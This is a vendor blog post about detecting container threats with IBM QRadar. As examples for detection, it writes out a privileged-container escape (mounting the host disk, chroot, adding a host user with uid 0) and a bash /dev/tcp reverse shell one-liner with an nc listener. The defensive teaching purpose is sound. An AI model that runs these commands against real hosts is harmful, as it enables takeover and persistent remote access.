IBM Security QRadar

 View Only

Threat Hunting in Containers

By MUTAZ ALSALLAL posted Wed October 02, 2019 12:48 PM

  

Containers are an operating system virtualisation technology used to package applications and their dependencies so that it can run anywhere. "write once, run anywhere."

With more and more production containers and services being deployed into cloud environments, the threat landscape has been evolved. Security analysts need to be aware of different threats targeting the containers landscape, especially during its run time, and how an adversary can break or escape the container to control the host operating system.

 

Container Runtime Security


One of the main techniques to detect if a container will be compromised is by monitoring the container behaviour in run time. It's not enough to scan the container image, and we need to keep an eye over its behaviour during runtime.

Containers share the host kernel, which makes it a way easier to monitor the container behaviour, as we can see every process execution, network connections, and file modifications from all the containers at the host level without the need to install any agent in the containers.

Using QRadar, we can baseline the container behaviour, and notify the security analysts when the container will deviate from its intended behaviour, like:

If a container will start executing unknown, unseen or unusual processes

If a container will communicate to an unusual IPs / network CIDRs / countries, …

Or if a container will modify critical files in the host operating system

 


Process Creation in a container

 

Escaping the Container


One of the main targets for adversaries is to escape the container and escalate their privileges to control the host operating system, there are several ways to achieve it, one of them, if the compromised container is a privileged container.

Security analyst needs to keep an eye over the privileged containers as they can access the host devices if the compromised container is a privileged one, then an adversary can mount the host hard disk, and edit any file in the host operating system.

As an example, let us create the following privileged container, and let’s see how we can add a new user in the host operating system, then to SSH to the host OS using the newly added user.

 

## to create a privileged container:

docker run --privileged -it ubuntu bash

 

Detecting the creation of a Privileged Container

As the privileged container can access the host devices, let us mount the host hard disk:

mkdir /mutaz

fdisk -l

mount /dev/sda1 /mutaz

 

Now let's us add a new privileged user in the host OS, we can do it by directly modifying the /etc/passwd in our mounted path, or by changing the process root directory to our mounted path

 

chroot /mutaz /bin/bash

adduser mike

 

Container added a new user in the host OS

 

We just added a new user in the host Operating System while we are inside the container, there are many different ways to make this user a privileged one, e.g., by adding the user to a privileged group, or an easy way to do it is just by changing the user uid to be zero, which also can be detected by looking for a non-root user with a uid of zero. Also, security analysts need to keep an eye if an unusual process will modify a critical file like /etc/passwd, sysadmins and DevOps will not directly modify such a file.

 

Reverse Shell for Persistence


One of the ways to achieve persistence, an adversary will need to plant a reverse shell which can be done in a single command line as follows:

 

bash -i >& /dev/tcp/192.168.0.171/4444 0>&1

 

the attacker will be waiting for any incoming connection to port 4444 as following:

nc -lvp 4444

 

Detection of Reverse Shell

 

Security analysts can hunt all the above malicious activities and more using the following out of the box QRadar content pack

https://exchange.xforce.ibmcloud.com/hub/extension/03b5e623d978dfa84b339dd6d38e02d5

 




#QRadar
0 comments
30 views

Permalink